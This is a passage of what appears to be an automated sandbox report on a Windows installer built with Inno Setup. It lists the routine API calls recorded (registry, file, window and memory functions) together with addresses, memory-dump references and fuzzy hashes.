Uniqueness Score: -1.00%

APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424382
• TranslateMessage.USER32(?), ref: 004243FF
• DispatchMessageA.USER32(?), ref: 00424409
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetPropA.USER32(00000000,00000000), ref: 004165DA
• SetPropA.USER32(00000000,00000000), ref: 004165EF
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 00416616
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Strings
Similarity
• API ID: Virtual$AllocFree
• String ID: ,#v
• API String ID: 2087232378-3386492414
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 0041EDD4
                                                                            • IsWindowEnabled.USER32(?), ref: 0041EDDE
                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EE04
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableEnabledVisible
                                                                            • String ID:
                                                                            • API String ID: 3234591441-0
                                                                            • Opcode ID: 09ca1b9a0e147f9e3f9c02f0c1b7de6c858dacd1e672d107cae65fab239c05be
                                                                            • Instruction ID: 54ed9e8c30520215bbb9e32f791a183ef62373b3d5af12756bdb3ea3c07ca3da
                                                                            • Opcode Fuzzy Hash: 09ca1b9a0e147f9e3f9c02f0c1b7de6c858dacd1e672d107cae65fab239c05be
                                                                            • Instruction Fuzzy Hash: 8EE0E5B81003006AD710AF27DC85A57B69CBB55314F55843BAC0597693E63ED9408AB8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GlobalHandle.KERNEL32 ref: 004062A1
                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 004062A8
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Global$FreeHandleWire
                                                                            • String ID:
                                                                            • API String ID: 318822183-0
                                                                            • Opcode ID: 811b5650058efd060b0480522622cea17f29fa46ba8acc2a698c355084a7e242
                                                                            • Instruction ID: 232b5a29dca1329e6ee8fbf729e049d74cb9239d0bdd557acda0a77be920d3a5
                                                                            • Opcode Fuzzy Hash: 811b5650058efd060b0480522622cea17f29fa46ba8acc2a698c355084a7e242
                                                                            • Instruction Fuzzy Hash: 73A001C4804A04A9D80072B2080BA2F244CD8413283D0496B7440B2183883C8C40593A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040867A), ref: 00408563
                                                                              • Part of subcall function 00406D54: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406D71
                                                                              • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                            • String ID: D)I
                                                                            • API String ID: 1658689577-3281296081
                                                                            • Opcode ID: 9103b9db00703e184e34eb4656f7bfd6b4db387a392b2c8979318a7ca80b884a
                                                                            • Instruction ID: f58fcf4e1761da05b427c157ba45b790d79041d0860886b9734fa9e18fdbd457
                                                                            • Opcode Fuzzy Hash: 9103b9db00703e184e34eb4656f7bfd6b4db387a392b2c8979318a7ca80b884a
                                                                            • Instruction Fuzzy Hash: B4316575E00109ABCF01EF95C8819DEB779FF84318F158577E815BB245E738AE058B94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetActiveWindow.USER32(?), ref: 0047CBF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveWindow
                                                                            • String ID: InitializeWizard
                                                                            • API String ID: 2558294473-2356795471
                                                                            • Opcode ID: 7279c2e58fd28a7885900cae1b936918ab34a155763bf2546a03f5746716a5ae
                                                                            • Instruction ID: 3ab1797be40594411df6c685a440b4787fcf783bea31960e6df624453c322c8c
                                                                            • Opcode Fuzzy Hash: 7279c2e58fd28a7885900cae1b936918ab34a155763bf2546a03f5746716a5ae
                                                                            • Instruction Fuzzy Hash: C011CE70208244AFD715EB6AFC92F4537A8E355328F2084BBF418CB3A1DB79A801CB0D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,004772FA,00000000,00477434), ref: 004770F9
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 004770C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                            • API String ID: 47109696-1019749484
                                                                            • Opcode ID: 71c6e6b3dc286b70a3593d79c622b1ea36892c5bd16880d74348932d8ba95855
                                                                            • Instruction ID: 04cc745cd351e58eb0cff21a747400ae09bf373c4f85ab843473da0d03261e2e
                                                                            • Opcode Fuzzy Hash: 71c6e6b3dc286b70a3593d79c622b1ea36892c5bd16880d74348932d8ba95855
                                                                            • Instruction Fuzzy Hash: 7BF0A7317081246BDA00A65E9C42BAFA7DDCB84758FA0443BF508EB343D9BD9E0243AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,004950AC,?,0046AB7B,?,00000000,0046B003,?,_is1), ref: 0046A89B
                                                                            Strings
                                                                            • Inno Setup: Setup Version, xrefs: 0046A899
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID: Inno Setup: Setup Version
                                                                            • API String ID: 3702945584-4166306022
                                                                            • Opcode ID: 7c674279de04d575b201b80dd7d27308a15b9831806c0875c4ebb08a754ba4da
                                                                            • Instruction ID: 9f8d8e903d06484b85b597de6eb29e8b1ae332426fce2fadbe533b90cf17b58b
                                                                            • Opcode Fuzzy Hash: 7c674279de04d575b201b80dd7d27308a15b9831806c0875c4ebb08a754ba4da
                                                                            • Instruction Fuzzy Hash: 38E06D713016043FD710AA2A9C85F5BBADCDF98366F10403AB908EB392D978DD0186A9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,004950AC,00000004,00000001,?,0046AF1B,?,?,00000000,0046B003,?,_is1,?), ref: 0046A8FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID: NoModify
                                                                            • API String ID: 3702945584-1699962838
                                                                            • Opcode ID: 7eb7c7e6cb67b214b7fefeacd9b811682ceea12d2a12e6196767648bea257352
                                                                            • Instruction ID: 3fa285531c513fb9f209240a3363212c8c226bbd47a131a1ec4299046806267d
                                                                            • Opcode Fuzzy Hash: 7eb7c7e6cb67b214b7fefeacd9b811682ceea12d2a12e6196767648bea257352
                                                                            • Instruction Fuzzy Hash: DAE04FB0640704BFEB04DB55CD4AF6B77ACDB48710F104059BA08EB291EA74FE00CA69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            Strings
                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 0042DC6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID: System\CurrentControlSet\Control\Windows
                                                                            • API String ID: 71445658-1109719901
                                                                            • Opcode ID: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                            • Instruction ID: fabb803f5ff523eeab3b7a035bb747b9213277980d9d81731b2bf545c5070290
                                                                            • Opcode Fuzzy Hash: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                            • Instruction Fuzzy Hash: EDD0C772910128BBDB10DA89DC41DF7775DDB59760F54401AFD0497141C1B4EC5197F4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DA74
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DAE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                            • Instruction ID: de7305fe23da407263f6a21fe748e6d6d926aae016943a7179aec9e2dd5a457b
                                                                            • Opcode Fuzzy Hash: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                            • Instruction Fuzzy Hash: 4F417171E04129AFDF10DF91D891BAFBBB8EB01704F918466E810B7240D778BE04CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DD8C
                                                                            • RegCloseKey.ADVAPI32(?,0042DDFD,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DDF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnumOpen
                                                                            • String ID:
                                                                            • API String ID: 1332880857-0
                                                                            • Opcode ID: ea84ca3d7e1f6c1c0b6d56cbe1a01e231d4ee03520b80429029a0b90aff89d77
                                                                            • Instruction ID: 8750a336c872ea863c0e9609c16c650b162605484654b044cfb671e23e380797
                                                                            • Opcode Fuzzy Hash: ea84ca3d7e1f6c1c0b6d56cbe1a01e231d4ee03520b80429029a0b90aff89d77
                                                                            • Instruction Fuzzy Hash: D031B370F046496FDB14DFA6DC42BAFBBB9EB48304F90407BE400F7281D6785A01CA29
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045BB38
                                                                            • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045BB7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocDecompressInitVirtualZ2_bz
                                                                            • String ID:
                                                                            • API String ID: 3582128297-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AF52
• FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B0AF,00000000,0040B0C7,?,?,?,00000000), ref: 0040AF63
Similarity
• API ID: Resource$FindFree
• String ID:
• API String ID: 4097029671-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 0041EE63
• 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
Similarity
• API ID: A15940CurrentThread
• String ID:
• API String ID: 1959240892-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 00451646
• GetLastError.KERNEL32(00000000,00000000,00000000,0045166C), ref: 0045164E
Similarity
• API ID: ErrorFileLastMove
• String ID:
• API String ID: 55378915-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001314,00005317,00401973), ref: 00401766
Strings
Similarity
• API ID: FreeVirtual
• String ID: ,#v
• API String ID: 1263568516-3386492414
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451153), ref: 0045112D
• GetLastError.KERNEL32(00000000,00000000,00000000,00451153), ref: 00451135
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• DeleteFileA.KERNEL32(00000000,00000000,004512E9,?,-00000001,?), ref: 004512C3
• GetLastError.KERNEL32(00000000,00000000,004512E9,?,-00000001,?), ref: 004512CB
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,004514C3,?,?,00000000), ref: 0045149D
• GetLastError.KERNEL32(00000000,00000000,004514C3,?,?,00000000), ref: 004514A5
Similarity
• API ID: AttributesErrorFileLast
• String ID:
• API String ID: 1799206407-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045BAF6), ref: 0045BC4A
Strings
• bzlib: Too much memory requested, xrefs: 0045BC25
Similarity
• API ID: AllocVirtual
• String ID: bzlib: Too much memory requested
• API String ID: 4275171209-1500031545
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 004231B9
• LoadCursorA.USER32(00000000,00000000), ref: 004231E3
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
• LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046BB71,?,00000000), ref: 0044FDE6
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046BB71,?,00000000), ref: 0044FDEE
  • Part of subcall function 0044FB8C: GetLastError.KERNEL32(0044F9A8,0044FC4E,?,00000000,?,00491CE4,00000001,00000000,00000002,00000000,00491E45,?,?,00000005,00000000,00491E79), ref: 0044FB8F
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Global$Alloc
• String ID:
• API String ID: 2558781224-0
                                                                            • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                            • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                            • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                            • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendNotifyMessageA.USER32(00020446,00000496,00002711,00000000), ref: 00478C14
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageNotifySend
                                                                            • String ID:
                                                                            • API String ID: 3556456075-0
                                                                            • Opcode ID: dd11d05620da802d8bb77eb810d1a1e8a62731b247d417d0c288434990103d14
                                                                            • Instruction ID: e9f93c3131ab9aed4d7988b9751f139f8c14b39f52ecba7056dfc34498fb85c2
                                                                            • Opcode Fuzzy Hash: dd11d05620da802d8bb77eb810d1a1e8a62731b247d417d0c288434990103d14
                                                                            • Instruction Fuzzy Hash: 0441A6746010008BC701FF66EC85A8B7BA5AB94309B65C57BB4049F3A7CA3CED478B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FBA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoScroll
                                                                            • String ID:
                                                                            • API String ID: 629608716-0
                                                                            • Opcode ID: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                            • Instruction ID: 884c2cb002146e47c45dd1875db58eae66db6a4caaf859e9ca4b80fd75174b4c
                                                                            • Opcode Fuzzy Hash: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                            • Instruction Fuzzy Hash: DD2130716087456FC340DF39D840696BBE4BB48344F148A3EA098C3341D774E99ACBD6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                              • Part of subcall function 0041EE14: 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046800E,?,00000000,?,?,0046821B,?,00000000,0046825A), ref: 00467FF2
                                                                              • Part of subcall function 0041EEC8: IsWindow.USER32(?), ref: 0041EED6
                                                                              • Part of subcall function 0041EEC8: EnableWindow.USER32(?,00000001), ref: 0041EEE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                            • String ID:
                                                                            • API String ID: 1039859321-0
                                                                            • Opcode ID: 1916fb52c999032ee8c755ca1a905755ac568ed81d39199cf5bb64b11a61d8f2
                                                                            • Instruction ID: 14fc102064ef3ab447e4390d65f6ef6ce5acf5f288e443c002039df4b727e1a7
                                                                            • Opcode Fuzzy Hash: 1916fb52c999032ee8c755ca1a905755ac568ed81d39199cf5bb64b11a61d8f2
                                                                            • Instruction Fuzzy Hash: 1AF0E975208300BFE7059FB2EC16B1677E8E349725F62087FF404971D0EA795844D51D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                            • Instruction ID: 8982111d837b22a654d5e287c7045eba67879d0a6afc285262999d3c1c57c6fe
                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                            • Instruction Fuzzy Hash: 51F06234105109DF9F2CCF58D0E59AF7761EB45700B2085AFE60787350CA34AD20DA59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 004164F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 2af4b48136c97ef475e2d548a532a987733a71f7bd8abfe4e609d79a0b30ebbf
                                                                            • Instruction ID: 34aaedb761569f87127437b87f660ad39376ae005fde3180b2cf9fb4127eef57
                                                                            • Opcode Fuzzy Hash: 2af4b48136c97ef475e2d548a532a987733a71f7bd8abfe4e609d79a0b30ebbf
                                                                            • Instruction Fuzzy Hash: A7F013B2200510AFDB94CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD220EC108BB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0041495F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
